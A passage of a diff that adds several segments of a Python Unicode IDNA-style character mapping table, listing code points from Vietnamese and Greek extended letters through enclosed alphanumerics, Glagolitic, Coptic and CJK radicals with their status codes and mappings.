'ề'), + (0x1EC1, 'V'), + (0x1EC2, 'M', 'ể'), + 
(0x1EC3, 'V'), + (0x1EC4, 'M', 'ễ'), + (0x1EC5, 'V'), + (0x1EC6, 'M', 'ệ'), + (0x1EC7, 'V'), + (0x1EC8, 'M', 'ỉ'), + (0x1EC9, 'V'), + (0x1ECA, 'M', 'ị'), + (0x1ECB, 'V'), + (0x1ECC, 'M', 'ọ'), + (0x1ECD, 'V'), + (0x1ECE, 'M', 'ỏ'), + (0x1ECF, 'V'), + (0x1ED0, 'M', 'ố'), + (0x1ED1, 'V'), + (0x1ED2, 'M', 'ồ'), + (0x1ED3, 'V'), + (0x1ED4, 'M', 'ổ'), + (0x1ED5, 'V'), + (0x1ED6, 'M', 'ỗ'), + (0x1ED7, 'V'), + (0x1ED8, 'M', 'ộ'), + (0x1ED9, 'V'), + (0x1EDA, 'M', 'ớ'), + (0x1EDB, 'V'), + (0x1EDC, 'M', 'ờ'), + (0x1EDD, 'V'), + (0x1EDE, 'M', 'ở'), + (0x1EDF, 'V'), + (0x1EE0, 'M', 'ỡ'), + (0x1EE1, 'V'), + (0x1EE2, 'M', 'ợ'), + (0x1EE3, 'V'), + (0x1EE4, 'M', 'ụ'), + (0x1EE5, 'V'), + (0x1EE6, 'M', 'ủ'), + (0x1EE7, 'V'), + (0x1EE8, 'M', 'ứ'), + (0x1EE9, 'V'), + (0x1EEA, 'M', 'ừ'), + (0x1EEB, 'V'), + (0x1EEC, 'M', 'ử'), + (0x1EED, 'V'), + (0x1EEE, 'M', 'ữ'), + (0x1EEF, 'V'), + (0x1EF0, 'M', 'ự'), + ] + +def _seg_19() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1EF1, 'V'), + (0x1EF2, 'M', 'ỳ'), + (0x1EF3, 'V'), + (0x1EF4, 'M', 'ỵ'), + (0x1EF5, 'V'), + (0x1EF6, 'M', 'ỷ'), + (0x1EF7, 'V'), + (0x1EF8, 'M', 'ỹ'), + (0x1EF9, 'V'), + (0x1EFA, 'M', 'ỻ'), + (0x1EFB, 'V'), + (0x1EFC, 'M', 'ỽ'), + (0x1EFD, 'V'), + (0x1EFE, 'M', 'ỿ'), + (0x1EFF, 'V'), + (0x1F08, 'M', 'ἀ'), + (0x1F09, 'M', 'ἁ'), + (0x1F0A, 'M', 'ἂ'), + (0x1F0B, 'M', 'ἃ'), + (0x1F0C, 'M', 'ἄ'), + (0x1F0D, 'M', 'ἅ'), + (0x1F0E, 'M', 'ἆ'), + (0x1F0F, 'M', 'ἇ'), + (0x1F10, 'V'), + (0x1F16, 'X'), + (0x1F18, 'M', 'ἐ'), + (0x1F19, 'M', 'ἑ'), + (0x1F1A, 'M', 'ἒ'), + (0x1F1B, 'M', 'ἓ'), + (0x1F1C, 'M', 'ἔ'), + (0x1F1D, 'M', 'ἕ'), + (0x1F1E, 'X'), + (0x1F20, 'V'), + (0x1F28, 'M', 'ἠ'), + (0x1F29, 'M', 'ἡ'), + (0x1F2A, 'M', 'ἢ'), + (0x1F2B, 'M', 'ἣ'), + (0x1F2C, 'M', 'ἤ'), + (0x1F2D, 'M', 'ἥ'), + (0x1F2E, 'M', 'ἦ'), + (0x1F2F, 'M', 'ἧ'), + (0x1F30, 'V'), + (0x1F38, 'M', 'ἰ'), + (0x1F39, 'M', 'ἱ'), + (0x1F3A, 'M', 'ἲ'), + (0x1F3B, 'M', 'ἳ'), + (0x1F3C, 'M', 'ἴ'), + (0x1F3D, 'M', 'ἵ'), + (0x1F3E, 'M', 'ἶ'), + (0x1F3F, 'M', 'ἷ'), + (0x1F40, 'V'), + (0x1F46, 'X'), + (0x1F48, 'M', 'ὀ'), + (0x1F49, 'M', 'ὁ'), + (0x1F4A, 'M', 'ὂ'), + (0x1F4B, 'M', 'ὃ'), + (0x1F4C, 'M', 'ὄ'), + (0x1F4D, 'M', 'ὅ'), + (0x1F4E, 'X'), + (0x1F50, 'V'), + (0x1F58, 'X'), + (0x1F59, 'M', 'ὑ'), + (0x1F5A, 'X'), + (0x1F5B, 'M', 'ὓ'), + (0x1F5C, 'X'), + (0x1F5D, 'M', 'ὕ'), + (0x1F5E, 'X'), + (0x1F5F, 'M', 'ὗ'), + (0x1F60, 'V'), + (0x1F68, 'M', 'ὠ'), + (0x1F69, 'M', 'ὡ'), + (0x1F6A, 'M', 'ὢ'), + (0x1F6B, 'M', 'ὣ'), + (0x1F6C, 'M', 'ὤ'), + (0x1F6D, 'M', 'ὥ'), + (0x1F6E, 'M', 'ὦ'), + (0x1F6F, 'M', 'ὧ'), + (0x1F70, 'V'), + (0x1F71, 'M', 'ά'), + (0x1F72, 'V'), + (0x1F73, 'M', 'έ'), + (0x1F74, 'V'), + (0x1F75, 'M', 'ή'), + (0x1F76, 'V'), + (0x1F77, 'M', 'ί'), + (0x1F78, 'V'), + (0x1F79, 'M', 'ό'), + (0x1F7A, 'V'), + (0x1F7B, 'M', 'ύ'), + (0x1F7C, 'V'), + (0x1F7D, 'M', 'ώ'), + (0x1F7E, 'X'), + (0x1F80, 'M', 'ἀι'), + (0x1F81, 'M', 'ἁι'), + (0x1F82, 'M', 'ἂι'), + (0x1F83, 'M', 'ἃι'), + (0x1F84, 'M', 'ἄι'), + (0x1F85, 'M', 'ἅι'), + (0x1F86, 'M', 'ἆι'), + (0x1F87, 'M', 'ἇι'), + ] + +def _seg_20() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1F88, 'M', 'ἀι'), + (0x1F89, 'M', 'ἁι'), + (0x1F8A, 'M', 'ἂι'), + (0x1F8B, 'M', 'ἃι'), + (0x1F8C, 'M', 'ἄι'), + (0x1F8D, 'M', 'ἅι'), + (0x1F8E, 'M', 'ἆι'), + (0x1F8F, 'M', 'ἇι'), + (0x1F90, 'M', 'ἠι'), + (0x1F91, 'M', 'ἡι'), + (0x1F92, 'M', 'ἢι'), + (0x1F93, 'M', 'ἣι'), + (0x1F94, 'M', 'ἤι'), + (0x1F95, 'M', 'ἥι'), + (0x1F96, 'M', 'ἦι'), + (0x1F97, 'M', 'ἧι'), + (0x1F98, 'M', 'ἠι'), + (0x1F99, 'M', 'ἡι'), + (0x1F9A, 
'M', 'ἢι'), + (0x1F9B, 'M', 'ἣι'), + (0x1F9C, 'M', 'ἤι'), + (0x1F9D, 'M', 'ἥι'), + (0x1F9E, 'M', 'ἦι'), + (0x1F9F, 'M', 'ἧι'), + (0x1FA0, 'M', 'ὠι'), + (0x1FA1, 'M', 'ὡι'), + (0x1FA2, 'M', 'ὢι'), + (0x1FA3, 'M', 'ὣι'), + (0x1FA4, 'M', 'ὤι'), + (0x1FA5, 'M', 'ὥι'), + (0x1FA6, 'M', 'ὦι'), + (0x1FA7, 'M', 'ὧι'), + (0x1FA8, 'M', 'ὠι'), + (0x1FA9, 'M', 'ὡι'), + (0x1FAA, 'M', 'ὢι'), + (0x1FAB, 'M', 'ὣι'), + (0x1FAC, 'M', 'ὤι'), + (0x1FAD, 'M', 'ὥι'), + (0x1FAE, 'M', 'ὦι'), + (0x1FAF, 'M', 'ὧι'), + (0x1FB0, 'V'), + (0x1FB2, 'M', 'ὰι'), + (0x1FB3, 'M', 'αι'), + (0x1FB4, 'M', 'άι'), + (0x1FB5, 'X'), + (0x1FB6, 'V'), + (0x1FB7, 'M', 'ᾶι'), + (0x1FB8, 'M', 'ᾰ'), + (0x1FB9, 'M', 'ᾱ'), + (0x1FBA, 'M', 'ὰ'), + (0x1FBB, 'M', 'ά'), + (0x1FBC, 'M', 'αι'), + (0x1FBD, '3', ' ̓'), + (0x1FBE, 'M', 'ι'), + (0x1FBF, '3', ' ̓'), + (0x1FC0, '3', ' ͂'), + (0x1FC1, '3', ' ̈͂'), + (0x1FC2, 'M', 'ὴι'), + (0x1FC3, 'M', 'ηι'), + (0x1FC4, 'M', 'ήι'), + (0x1FC5, 'X'), + (0x1FC6, 'V'), + (0x1FC7, 'M', 'ῆι'), + (0x1FC8, 'M', 'ὲ'), + (0x1FC9, 'M', 'έ'), + (0x1FCA, 'M', 'ὴ'), + (0x1FCB, 'M', 'ή'), + (0x1FCC, 'M', 'ηι'), + (0x1FCD, '3', ' ̓̀'), + (0x1FCE, '3', ' ̓́'), + (0x1FCF, '3', ' ̓͂'), + (0x1FD0, 'V'), + (0x1FD3, 'M', 'ΐ'), + (0x1FD4, 'X'), + (0x1FD6, 'V'), + (0x1FD8, 'M', 'ῐ'), + (0x1FD9, 'M', 'ῑ'), + (0x1FDA, 'M', 'ὶ'), + (0x1FDB, 'M', 'ί'), + (0x1FDC, 'X'), + (0x1FDD, '3', ' ̔̀'), + (0x1FDE, '3', ' ̔́'), + (0x1FDF, '3', ' ̔͂'), + (0x1FE0, 'V'), + (0x1FE3, 'M', 'ΰ'), + (0x1FE4, 'V'), + (0x1FE8, 'M', 'ῠ'), + (0x1FE9, 'M', 'ῡ'), + (0x1FEA, 'M', 'ὺ'), + (0x1FEB, 'M', 'ύ'), + (0x1FEC, 'M', 'ῥ'), + (0x1FED, '3', ' ̈̀'), + (0x1FEE, '3', ' ̈́'), + (0x1FEF, '3', '`'), + (0x1FF0, 'X'), + (0x1FF2, 'M', 'ὼι'), + (0x1FF3, 'M', 'ωι'), + (0x1FF4, 'M', 'ώι'), + (0x1FF5, 'X'), + (0x1FF6, 'V'), + ] + +def _seg_21() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x1FF7, 'M', 'ῶι'), + (0x1FF8, 'M', 'ὸ'), + (0x1FF9, 'M', 'ό'), + (0x1FFA, 'M', 'ὼ'), + (0x1FFB, 'M', 'ώ'), + (0x1FFC, 'M', 'ωι'), + (0x1FFD, '3', ' ́'), + (0x1FFE, '3', ' ̔'), + (0x1FFF, 'X'), + (0x2000, '3', ' '), + (0x200B, 'I'), + (0x200C, 'D', ''), + (0x200E, 'X'), + (0x2010, 'V'), + (0x2011, 'M', '‐'), + (0x2012, 'V'), + (0x2017, '3', ' ̳'), + (0x2018, 'V'), + (0x2024, 'X'), + (0x2027, 'V'), + (0x2028, 'X'), + (0x202F, '3', ' '), + (0x2030, 'V'), + (0x2033, 'M', '′′'), + (0x2034, 'M', '′′′'), + (0x2035, 'V'), + (0x2036, 'M', '‵‵'), + (0x2037, 'M', '‵‵‵'), + (0x2038, 'V'), + (0x203C, '3', '!!'), + (0x203D, 'V'), + (0x203E, '3', ' ̅'), + (0x203F, 'V'), + (0x2047, '3', '??'), + (0x2048, '3', '?!'), + (0x2049, '3', '!?'), + (0x204A, 'V'), + (0x2057, 'M', '′′′′'), + (0x2058, 'V'), + (0x205F, '3', ' '), + (0x2060, 'I'), + (0x2061, 'X'), + (0x2064, 'I'), + (0x2065, 'X'), + (0x2070, 'M', '0'), + (0x2071, 'M', 'i'), + (0x2072, 'X'), + (0x2074, 'M', '4'), + (0x2075, 'M', '5'), + (0x2076, 'M', '6'), + (0x2077, 'M', '7'), + (0x2078, 'M', '8'), + (0x2079, 'M', '9'), + (0x207A, '3', '+'), + (0x207B, 'M', '−'), + (0x207C, '3', '='), + (0x207D, '3', '('), + (0x207E, '3', ')'), + (0x207F, 'M', 'n'), + (0x2080, 'M', '0'), + (0x2081, 'M', '1'), + (0x2082, 'M', '2'), + (0x2083, 'M', '3'), + (0x2084, 'M', '4'), + (0x2085, 'M', '5'), + (0x2086, 'M', '6'), + (0x2087, 'M', '7'), + (0x2088, 'M', '8'), + (0x2089, 'M', '9'), + (0x208A, '3', '+'), + (0x208B, 'M', '−'), + (0x208C, '3', '='), + (0x208D, '3', '('), + (0x208E, '3', ')'), + (0x208F, 'X'), + (0x2090, 'M', 'a'), + (0x2091, 'M', 'e'), + (0x2092, 'M', 'o'), + (0x2093, 'M', 'x'), + (0x2094, 'M', 'ə'), + (0x2095, 'M', 
'h'), + (0x2096, 'M', 'k'), + (0x2097, 'M', 'l'), + (0x2098, 'M', 'm'), + (0x2099, 'M', 'n'), + (0x209A, 'M', 'p'), + (0x209B, 'M', 's'), + (0x209C, 'M', 't'), + (0x209D, 'X'), + (0x20A0, 'V'), + (0x20A8, 'M', 'rs'), + (0x20A9, 'V'), + (0x20C1, 'X'), + (0x20D0, 'V'), + (0x20F1, 'X'), + (0x2100, '3', 'a/c'), + (0x2101, '3', 'a/s'), + (0x2102, 'M', 'c'), + (0x2103, 'M', '°c'), + (0x2104, 'V'), + ] + +def _seg_22() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2105, '3', 'c/o'), + (0x2106, '3', 'c/u'), + (0x2107, 'M', 'ɛ'), + (0x2108, 'V'), + (0x2109, 'M', '°f'), + (0x210A, 'M', 'g'), + (0x210B, 'M', 'h'), + (0x210F, 'M', 'ħ'), + (0x2110, 'M', 'i'), + (0x2112, 'M', 'l'), + (0x2114, 'V'), + (0x2115, 'M', 'n'), + (0x2116, 'M', 'no'), + (0x2117, 'V'), + (0x2119, 'M', 'p'), + (0x211A, 'M', 'q'), + (0x211B, 'M', 'r'), + (0x211E, 'V'), + (0x2120, 'M', 'sm'), + (0x2121, 'M', 'tel'), + (0x2122, 'M', 'tm'), + (0x2123, 'V'), + (0x2124, 'M', 'z'), + (0x2125, 'V'), + (0x2126, 'M', 'ω'), + (0x2127, 'V'), + (0x2128, 'M', 'z'), + (0x2129, 'V'), + (0x212A, 'M', 'k'), + (0x212B, 'M', 'å'), + (0x212C, 'M', 'b'), + (0x212D, 'M', 'c'), + (0x212E, 'V'), + (0x212F, 'M', 'e'), + (0x2131, 'M', 'f'), + (0x2132, 'X'), + (0x2133, 'M', 'm'), + (0x2134, 'M', 'o'), + (0x2135, 'M', 'א'), + (0x2136, 'M', 'ב'), + (0x2137, 'M', 'ג'), + (0x2138, 'M', 'ד'), + (0x2139, 'M', 'i'), + (0x213A, 'V'), + (0x213B, 'M', 'fax'), + (0x213C, 'M', 'π'), + (0x213D, 'M', 'γ'), + (0x213F, 'M', 'π'), + (0x2140, 'M', '∑'), + (0x2141, 'V'), + (0x2145, 'M', 'd'), + (0x2147, 'M', 'e'), + (0x2148, 'M', 'i'), + (0x2149, 'M', 'j'), + (0x214A, 'V'), + (0x2150, 'M', '1⁄7'), + (0x2151, 'M', '1⁄9'), + (0x2152, 'M', '1⁄10'), + (0x2153, 'M', '1⁄3'), + (0x2154, 'M', '2⁄3'), + (0x2155, 'M', '1⁄5'), + (0x2156, 'M', '2⁄5'), + (0x2157, 'M', '3⁄5'), + (0x2158, 'M', '4⁄5'), + (0x2159, 'M', '1⁄6'), + (0x215A, 'M', '5⁄6'), + (0x215B, 'M', '1⁄8'), + (0x215C, 'M', '3⁄8'), + (0x215D, 'M', '5⁄8'), + (0x215E, 'M', '7⁄8'), + (0x215F, 'M', '1⁄'), + (0x2160, 'M', 'i'), + (0x2161, 'M', 'ii'), + (0x2162, 'M', 'iii'), + (0x2163, 'M', 'iv'), + (0x2164, 'M', 'v'), + (0x2165, 'M', 'vi'), + (0x2166, 'M', 'vii'), + (0x2167, 'M', 'viii'), + (0x2168, 'M', 'ix'), + (0x2169, 'M', 'x'), + (0x216A, 'M', 'xi'), + (0x216B, 'M', 'xii'), + (0x216C, 'M', 'l'), + (0x216D, 'M', 'c'), + (0x216E, 'M', 'd'), + (0x216F, 'M', 'm'), + (0x2170, 'M', 'i'), + (0x2171, 'M', 'ii'), + (0x2172, 'M', 'iii'), + (0x2173, 'M', 'iv'), + (0x2174, 'M', 'v'), + (0x2175, 'M', 'vi'), + (0x2176, 'M', 'vii'), + (0x2177, 'M', 'viii'), + (0x2178, 'M', 'ix'), + (0x2179, 'M', 'x'), + (0x217A, 'M', 'xi'), + (0x217B, 'M', 'xii'), + (0x217C, 'M', 'l'), + ] + +def _seg_23() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x217D, 'M', 'c'), + (0x217E, 'M', 'd'), + (0x217F, 'M', 'm'), + (0x2180, 'V'), + (0x2183, 'X'), + (0x2184, 'V'), + (0x2189, 'M', '0⁄3'), + (0x218A, 'V'), + (0x218C, 'X'), + (0x2190, 'V'), + (0x222C, 'M', '∫∫'), + (0x222D, 'M', '∫∫∫'), + (0x222E, 'V'), + (0x222F, 'M', '∮∮'), + (0x2230, 'M', '∮∮∮'), + (0x2231, 'V'), + (0x2260, '3'), + (0x2261, 'V'), + (0x226E, '3'), + (0x2270, 'V'), + (0x2329, 'M', '〈'), + (0x232A, 'M', '〉'), + (0x232B, 'V'), + (0x2427, 'X'), + (0x2440, 'V'), + (0x244B, 'X'), + (0x2460, 'M', '1'), + (0x2461, 'M', '2'), + (0x2462, 'M', '3'), + (0x2463, 'M', '4'), + (0x2464, 'M', '5'), + (0x2465, 'M', '6'), + (0x2466, 'M', '7'), + (0x2467, 'M', '8'), + (0x2468, 'M', '9'), + (0x2469, 'M', '10'), + (0x246A, 'M', '11'), + (0x246B, 'M', '12'), + (0x246C, 
'M', '13'), + (0x246D, 'M', '14'), + (0x246E, 'M', '15'), + (0x246F, 'M', '16'), + (0x2470, 'M', '17'), + (0x2471, 'M', '18'), + (0x2472, 'M', '19'), + (0x2473, 'M', '20'), + (0x2474, '3', '(1)'), + (0x2475, '3', '(2)'), + (0x2476, '3', '(3)'), + (0x2477, '3', '(4)'), + (0x2478, '3', '(5)'), + (0x2479, '3', '(6)'), + (0x247A, '3', '(7)'), + (0x247B, '3', '(8)'), + (0x247C, '3', '(9)'), + (0x247D, '3', '(10)'), + (0x247E, '3', '(11)'), + (0x247F, '3', '(12)'), + (0x2480, '3', '(13)'), + (0x2481, '3', '(14)'), + (0x2482, '3', '(15)'), + (0x2483, '3', '(16)'), + (0x2484, '3', '(17)'), + (0x2485, '3', '(18)'), + (0x2486, '3', '(19)'), + (0x2487, '3', '(20)'), + (0x2488, 'X'), + (0x249C, '3', '(a)'), + (0x249D, '3', '(b)'), + (0x249E, '3', '(c)'), + (0x249F, '3', '(d)'), + (0x24A0, '3', '(e)'), + (0x24A1, '3', '(f)'), + (0x24A2, '3', '(g)'), + (0x24A3, '3', '(h)'), + (0x24A4, '3', '(i)'), + (0x24A5, '3', '(j)'), + (0x24A6, '3', '(k)'), + (0x24A7, '3', '(l)'), + (0x24A8, '3', '(m)'), + (0x24A9, '3', '(n)'), + (0x24AA, '3', '(o)'), + (0x24AB, '3', '(p)'), + (0x24AC, '3', '(q)'), + (0x24AD, '3', '(r)'), + (0x24AE, '3', '(s)'), + (0x24AF, '3', '(t)'), + (0x24B0, '3', '(u)'), + (0x24B1, '3', '(v)'), + (0x24B2, '3', '(w)'), + (0x24B3, '3', '(x)'), + (0x24B4, '3', '(y)'), + (0x24B5, '3', '(z)'), + (0x24B6, 'M', 'a'), + (0x24B7, 'M', 'b'), + (0x24B8, 'M', 'c'), + (0x24B9, 'M', 'd'), + (0x24BA, 'M', 'e'), + (0x24BB, 'M', 'f'), + (0x24BC, 'M', 'g'), + ] + +def _seg_24() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x24BD, 'M', 'h'), + (0x24BE, 'M', 'i'), + (0x24BF, 'M', 'j'), + (0x24C0, 'M', 'k'), + (0x24C1, 'M', 'l'), + (0x24C2, 'M', 'm'), + (0x24C3, 'M', 'n'), + (0x24C4, 'M', 'o'), + (0x24C5, 'M', 'p'), + (0x24C6, 'M', 'q'), + (0x24C7, 'M', 'r'), + (0x24C8, 'M', 's'), + (0x24C9, 'M', 't'), + (0x24CA, 'M', 'u'), + (0x24CB, 'M', 'v'), + (0x24CC, 'M', 'w'), + (0x24CD, 'M', 'x'), + (0x24CE, 'M', 'y'), + (0x24CF, 'M', 'z'), + (0x24D0, 'M', 'a'), + (0x24D1, 'M', 'b'), + (0x24D2, 'M', 'c'), + (0x24D3, 'M', 'd'), + (0x24D4, 'M', 'e'), + (0x24D5, 'M', 'f'), + (0x24D6, 'M', 'g'), + (0x24D7, 'M', 'h'), + (0x24D8, 'M', 'i'), + (0x24D9, 'M', 'j'), + (0x24DA, 'M', 'k'), + (0x24DB, 'M', 'l'), + (0x24DC, 'M', 'm'), + (0x24DD, 'M', 'n'), + (0x24DE, 'M', 'o'), + (0x24DF, 'M', 'p'), + (0x24E0, 'M', 'q'), + (0x24E1, 'M', 'r'), + (0x24E2, 'M', 's'), + (0x24E3, 'M', 't'), + (0x24E4, 'M', 'u'), + (0x24E5, 'M', 'v'), + (0x24E6, 'M', 'w'), + (0x24E7, 'M', 'x'), + (0x24E8, 'M', 'y'), + (0x24E9, 'M', 'z'), + (0x24EA, 'M', '0'), + (0x24EB, 'V'), + (0x2A0C, 'M', '∫∫∫∫'), + (0x2A0D, 'V'), + (0x2A74, '3', '::='), + (0x2A75, '3', '=='), + (0x2A76, '3', '==='), + (0x2A77, 'V'), + (0x2ADC, 'M', '⫝̸'), + (0x2ADD, 'V'), + (0x2B74, 'X'), + (0x2B76, 'V'), + (0x2B96, 'X'), + (0x2B97, 'V'), + (0x2C00, 'M', 'ⰰ'), + (0x2C01, 'M', 'ⰱ'), + (0x2C02, 'M', 'ⰲ'), + (0x2C03, 'M', 'ⰳ'), + (0x2C04, 'M', 'ⰴ'), + (0x2C05, 'M', 'ⰵ'), + (0x2C06, 'M', 'ⰶ'), + (0x2C07, 'M', 'ⰷ'), + (0x2C08, 'M', 'ⰸ'), + (0x2C09, 'M', 'ⰹ'), + (0x2C0A, 'M', 'ⰺ'), + (0x2C0B, 'M', 'ⰻ'), + (0x2C0C, 'M', 'ⰼ'), + (0x2C0D, 'M', 'ⰽ'), + (0x2C0E, 'M', 'ⰾ'), + (0x2C0F, 'M', 'ⰿ'), + (0x2C10, 'M', 'ⱀ'), + (0x2C11, 'M', 'ⱁ'), + (0x2C12, 'M', 'ⱂ'), + (0x2C13, 'M', 'ⱃ'), + (0x2C14, 'M', 'ⱄ'), + (0x2C15, 'M', 'ⱅ'), + (0x2C16, 'M', 'ⱆ'), + (0x2C17, 'M', 'ⱇ'), + (0x2C18, 'M', 'ⱈ'), + (0x2C19, 'M', 'ⱉ'), + (0x2C1A, 'M', 'ⱊ'), + (0x2C1B, 'M', 'ⱋ'), + (0x2C1C, 'M', 'ⱌ'), + (0x2C1D, 'M', 'ⱍ'), + (0x2C1E, 'M', 'ⱎ'), + (0x2C1F, 'M', 'ⱏ'), + (0x2C20, 'M', 'ⱐ'), + (0x2C21, 'M', 
'ⱑ'), + (0x2C22, 'M', 'ⱒ'), + (0x2C23, 'M', 'ⱓ'), + (0x2C24, 'M', 'ⱔ'), + (0x2C25, 'M', 'ⱕ'), + (0x2C26, 'M', 'ⱖ'), + (0x2C27, 'M', 'ⱗ'), + (0x2C28, 'M', 'ⱘ'), + ] + +def _seg_25() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2C29, 'M', 'ⱙ'), + (0x2C2A, 'M', 'ⱚ'), + (0x2C2B, 'M', 'ⱛ'), + (0x2C2C, 'M', 'ⱜ'), + (0x2C2D, 'M', 'ⱝ'), + (0x2C2E, 'M', 'ⱞ'), + (0x2C2F, 'M', 'ⱟ'), + (0x2C30, 'V'), + (0x2C60, 'M', 'ⱡ'), + (0x2C61, 'V'), + (0x2C62, 'M', 'ɫ'), + (0x2C63, 'M', 'ᵽ'), + (0x2C64, 'M', 'ɽ'), + (0x2C65, 'V'), + (0x2C67, 'M', 'ⱨ'), + (0x2C68, 'V'), + (0x2C69, 'M', 'ⱪ'), + (0x2C6A, 'V'), + (0x2C6B, 'M', 'ⱬ'), + (0x2C6C, 'V'), + (0x2C6D, 'M', 'ɑ'), + (0x2C6E, 'M', 'ɱ'), + (0x2C6F, 'M', 'ɐ'), + (0x2C70, 'M', 'ɒ'), + (0x2C71, 'V'), + (0x2C72, 'M', 'ⱳ'), + (0x2C73, 'V'), + (0x2C75, 'M', 'ⱶ'), + (0x2C76, 'V'), + (0x2C7C, 'M', 'j'), + (0x2C7D, 'M', 'v'), + (0x2C7E, 'M', 'ȿ'), + (0x2C7F, 'M', 'ɀ'), + (0x2C80, 'M', 'ⲁ'), + (0x2C81, 'V'), + (0x2C82, 'M', 'ⲃ'), + (0x2C83, 'V'), + (0x2C84, 'M', 'ⲅ'), + (0x2C85, 'V'), + (0x2C86, 'M', 'ⲇ'), + (0x2C87, 'V'), + (0x2C88, 'M', 'ⲉ'), + (0x2C89, 'V'), + (0x2C8A, 'M', 'ⲋ'), + (0x2C8B, 'V'), + (0x2C8C, 'M', 'ⲍ'), + (0x2C8D, 'V'), + (0x2C8E, 'M', 'ⲏ'), + (0x2C8F, 'V'), + (0x2C90, 'M', 'ⲑ'), + (0x2C91, 'V'), + (0x2C92, 'M', 'ⲓ'), + (0x2C93, 'V'), + (0x2C94, 'M', 'ⲕ'), + (0x2C95, 'V'), + (0x2C96, 'M', 'ⲗ'), + (0x2C97, 'V'), + (0x2C98, 'M', 'ⲙ'), + (0x2C99, 'V'), + (0x2C9A, 'M', 'ⲛ'), + (0x2C9B, 'V'), + (0x2C9C, 'M', 'ⲝ'), + (0x2C9D, 'V'), + (0x2C9E, 'M', 'ⲟ'), + (0x2C9F, 'V'), + (0x2CA0, 'M', 'ⲡ'), + (0x2CA1, 'V'), + (0x2CA2, 'M', 'ⲣ'), + (0x2CA3, 'V'), + (0x2CA4, 'M', 'ⲥ'), + (0x2CA5, 'V'), + (0x2CA6, 'M', 'ⲧ'), + (0x2CA7, 'V'), + (0x2CA8, 'M', 'ⲩ'), + (0x2CA9, 'V'), + (0x2CAA, 'M', 'ⲫ'), + (0x2CAB, 'V'), + (0x2CAC, 'M', 'ⲭ'), + (0x2CAD, 'V'), + (0x2CAE, 'M', 'ⲯ'), + (0x2CAF, 'V'), + (0x2CB0, 'M', 'ⲱ'), + (0x2CB1, 'V'), + (0x2CB2, 'M', 'ⲳ'), + (0x2CB3, 'V'), + (0x2CB4, 'M', 'ⲵ'), + (0x2CB5, 'V'), + (0x2CB6, 'M', 'ⲷ'), + (0x2CB7, 'V'), + (0x2CB8, 'M', 'ⲹ'), + (0x2CB9, 'V'), + (0x2CBA, 'M', 'ⲻ'), + (0x2CBB, 'V'), + (0x2CBC, 'M', 'ⲽ'), + (0x2CBD, 'V'), + (0x2CBE, 'M', 'ⲿ'), + (0x2CBF, 'V'), + (0x2CC0, 'M', 'ⳁ'), + (0x2CC1, 'V'), + (0x2CC2, 'M', 'ⳃ'), + ] + +def _seg_26() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2CC3, 'V'), + (0x2CC4, 'M', 'ⳅ'), + (0x2CC5, 'V'), + (0x2CC6, 'M', 'ⳇ'), + (0x2CC7, 'V'), + (0x2CC8, 'M', 'ⳉ'), + (0x2CC9, 'V'), + (0x2CCA, 'M', 'ⳋ'), + (0x2CCB, 'V'), + (0x2CCC, 'M', 'ⳍ'), + (0x2CCD, 'V'), + (0x2CCE, 'M', 'ⳏ'), + (0x2CCF, 'V'), + (0x2CD0, 'M', 'ⳑ'), + (0x2CD1, 'V'), + (0x2CD2, 'M', 'ⳓ'), + (0x2CD3, 'V'), + (0x2CD4, 'M', 'ⳕ'), + (0x2CD5, 'V'), + (0x2CD6, 'M', 'ⳗ'), + (0x2CD7, 'V'), + (0x2CD8, 'M', 'ⳙ'), + (0x2CD9, 'V'), + (0x2CDA, 'M', 'ⳛ'), + (0x2CDB, 'V'), + (0x2CDC, 'M', 'ⳝ'), + (0x2CDD, 'V'), + (0x2CDE, 'M', 'ⳟ'), + (0x2CDF, 'V'), + (0x2CE0, 'M', 'ⳡ'), + (0x2CE1, 'V'), + (0x2CE2, 'M', 'ⳣ'), + (0x2CE3, 'V'), + (0x2CEB, 'M', 'ⳬ'), + (0x2CEC, 'V'), + (0x2CED, 'M', 'ⳮ'), + (0x2CEE, 'V'), + (0x2CF2, 'M', 'ⳳ'), + (0x2CF3, 'V'), + (0x2CF4, 'X'), + (0x2CF9, 'V'), + (0x2D26, 'X'), + (0x2D27, 'V'), + (0x2D28, 'X'), + (0x2D2D, 'V'), + (0x2D2E, 'X'), + (0x2D30, 'V'), + (0x2D68, 'X'), + (0x2D6F, 'M', 'ⵡ'), + (0x2D70, 'V'), + (0x2D71, 'X'), + (0x2D7F, 'V'), + (0x2D97, 'X'), + (0x2DA0, 'V'), + (0x2DA7, 'X'), + (0x2DA8, 'V'), + (0x2DAF, 'X'), + (0x2DB0, 'V'), + (0x2DB7, 'X'), + (0x2DB8, 'V'), + (0x2DBF, 'X'), + (0x2DC0, 'V'), + (0x2DC7, 'X'), + (0x2DC8, 'V'), + (0x2DCF, 'X'), + (0x2DD0, 'V'), + 
(0x2DD7, 'X'), + (0x2DD8, 'V'), + (0x2DDF, 'X'), + (0x2DE0, 'V'), + (0x2E5E, 'X'), + (0x2E80, 'V'), + (0x2E9A, 'X'), + (0x2E9B, 'V'), + (0x2E9F, 'M', '母'), + (0x2EA0, 'V'), + (0x2EF3, 'M', '龟'), + (0x2EF4, 'X'), + (0x2F00, 'M', '一'), + (0x2F01, 'M', '丨'), + (0x2F02, 'M', '丶'), + (0x2F03, 'M', '丿'), + (0x2F04, 'M', '乙'), + (0x2F05, 'M', '亅'), + (0x2F06, 'M', '二'), + (0x2F07, 'M', '亠'), + (0x2F08, 'M', '人'), + (0x2F09, 'M', '儿'), + (0x2F0A, 'M', '入'), + (0x2F0B, 'M', '八'), + (0x2F0C, 'M', '冂'), + (0x2F0D, 'M', '冖'), + (0x2F0E, 'M', '冫'), + (0x2F0F, 'M', '几'), + (0x2F10, 'M', '凵'), + (0x2F11, 'M', '刀'), + (0x2F12, 'M', '力'), + (0x2F13, 'M', '勹'), + (0x2F14, 'M', '匕'), + (0x2F15, 'M', '匚'), + ] + +def _seg_27() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x2F16, 'M', '匸'), + 